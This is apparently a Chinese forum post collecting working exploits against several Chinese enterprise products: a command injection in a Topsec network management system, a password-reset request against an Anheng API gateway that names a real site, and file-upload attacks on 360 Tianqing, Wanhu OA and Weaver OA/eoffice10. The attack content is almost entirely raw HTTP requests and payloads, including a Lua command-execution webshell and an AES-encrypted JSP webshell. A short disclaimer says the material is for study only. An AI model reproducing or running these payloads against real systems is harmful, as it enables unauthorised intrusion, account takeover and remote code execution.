|
|
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!
天融信 - 上网行为管理系统
一句话
- /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20
- echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a
Base64 版
- /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20
- echo%20PD9waHAgcGhwaW5mbygpOz8+%20%7Cbase64%20-
- d%20%3E%3E%20/var/www/html/1.php%0a
安恒数据大脑 API 网关任意密码重置漏洞
安恒数据大脑 API (https://www.websaas.cn/) 存在任意密码重置漏洞,这里以网站 https://waf-mgmt.pinganyun.com/q/#/ 为例:
在前端代码中包含重置密码的连接以及密码加密方式
按照前端代码说明,构造重置密码数据包
- //此处重置的密码为:p@ssw0rd
- POST /q/common-permission/public/users/forgetPassword HTTP/1.1
- Host: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
- Accept-Language: en-US,en;q=0.5
- Content-type: application/json
- Accept-Encoding: gzip, deflate
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Length: 104
- {"code":XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX,"rememberMe":false,"use
- rname":"admin","password":"XXXXXXXXXXXXXXXXXXXXXXXXXX"}
360 天擎任意文件上传
/api/client_upload_file.json
- POST /api/client_upload_file.json?mid=12345678901234567890123456789012&md5=123456
- 78901234567890123456789012&filename=../../lua/123.LUAC HTTP/1.1
- Host: 192.168.11.210
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15
- (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Content-Length: 323
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91ox
- Q
- Referer: http://192.168.11.210
- Accept-Encoding: gzip
- ------WebKitFormBoundaryLx7ATxHThfk91oxQ
- Content-Disposition: form-data; name="file"; filename="flash.php"
- Content-Type: application/xxxx
- if ngx.req.get_uri_args().cmd then
- cmd = ngx.req.get_uri_args().cmd
- local t = io.popen(cmd)
- local a = t:read("*all")
- ngx.say(a)
- end------WebKitFormBoundaryLx7ATxHThfk91oxQ--
万户 OA 文件上传
/defaultroot/officeserverservlet
- POST /defaultroot/officeserverservlet HTTP/1.1
- Host: XXXXXXXXX:7001
- Content-Length: 782
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- Origin: http://XXXXXXXX7001
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li
- ke Gecko) Chrome/89.0.4389.114 Safari/537.36
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
- e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- Accept-Language: zh-CN,zh;q=0.9
- Cookie: OASESSIONID=CC676F4D1C584324CEFE311E71F2EA08; LocLan=zh_CN
- Connection: close
- DBSTEP V3.0 170 0 1000 DBSTEP=REJTVE
- VQ
- OPTION=U0FWRUZJTEU=
- RECORDID=
- isDoc=dHJ1ZQ==
- moduleType=Z292ZG9jdW1lbnQ=
- FILETYPE=Li4vLi4vdXBncmFkZS82LmpzcA==
- 111111111111111111111111111111111111111
- <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends Class
- Loader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.le
- ngth);}}%><%if (request.getMethod().equals("POST")){String k="892368804b205b83";/*man
- ba*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec
- (k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE6
- 4Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContex
- t);}%>
DBSTEP V3.0 170 0 1000
170 是控制从报文中什么地方读取
1000 是控制 webshell 源代码内容大小
泛微 OA 文件上传
/workrelate/plan/util/uploaderOperate.jsp
- POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
- Host: X.X.X.X
- Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
- Sec-Ch-Ua-Mobile: ?0
- Sec-Ch-Ua-Platform: "macOS"
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
- Gecko) Chrome/101.0.4951.64 Safari/537.36
- Accept:
- text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
- *;q=0.8,application/signed-exchange;v=b3;q=0.9
- Sec-Fetch-Site: none
- Sec-Fetch-Mode: navigate
- Sec-Fetch-User: ?1
- Sec-Fetch-Dest: document
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
- Connection: close
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
- Content-Length: 393
- ------WebKitFormBoundarymVk33liI64J7GQaK
- Content-Disposition: form-data; name="secId"
- 1
- ------WebKitFormBoundarymVk33liI64J7GQaK
- Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"
- Test
- ------WebKitFormBoundarymVk33liI64J7GQaK
- Content-Disposition: form-data; name="plandetailid"
- 1
- ------WebKitFormBoundarymVk33liI64J7GQaK—
将文件释放至跟网站根路径下 在数据包中将 fileid 替换
- POST /OfficeServer HTTP/1.1
- Host: X.X.X.X
- Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
- Sec-Ch-Ua-Mobile: ?0
- Sec-Ch-Ua-Platform: "macOS"
- Upgrade-Insecure-Requests: 1
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
- Gecko) Chrome/101.0.4951.64 Safari/537.36
- Accept:
- text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
- *;q=0.8,application/signed-exchange;v=b3;q=0.9
- Sec-Fetch-Site: none
- Sec-Fetch-Mode: navigate
- Sec-Fetch-User: ?1
- Sec-Fetch-Dest: document
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
- Connection: close
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
- Content-Length: 207
- ------WebKitFormBoundarymVk33liI64J7GQaK
- Content-Disposition: form-data; name="aaa"
- {'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
- ------WebKitFormBoundarymVk33liI64J7GQaK—
泛微 eoffice10 前台 getshell
eoffice10/version.json
版本号:http://XXXXXXX:8010/eoffice10/version.json
- <form method='post'
- action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
- enctype="multipart/form-data" >
- <input type="file" name="FileData"/></br></br>
- <input type="text" name="FormData" value="1"/></br></br>
- <button type=submit value="上传">上传</button> </form>
shell http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php
- POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
- Host: XXXXXXXX:8010
- Content-Length: 378
- Cache-Control: max-age=0
- Upgrade-Insecure-Requests: 1
- Origin: null
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
- Gecko) Chrome/91.0.4472.77 Safari/537.36
- Accept:
- text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
- *;q=0.8,application/signed-exchange;v=b3;q=0.9
- Accept-Encoding: gzip, deflate
- Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
- Connection: close
- ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
- Content-Disposition: form-data; name="FileData"; filename="1.jpg"
- Content-Type: image/jpeg
- <?php echo md5(1);?>
- ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
- Content-Disposition: form-data; name="FormData"
- {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
- ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
|
|
窥视卡
雷达卡
发表于 2022-7-28 11:49:37
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
发表于 2022-7-28 13:20:32
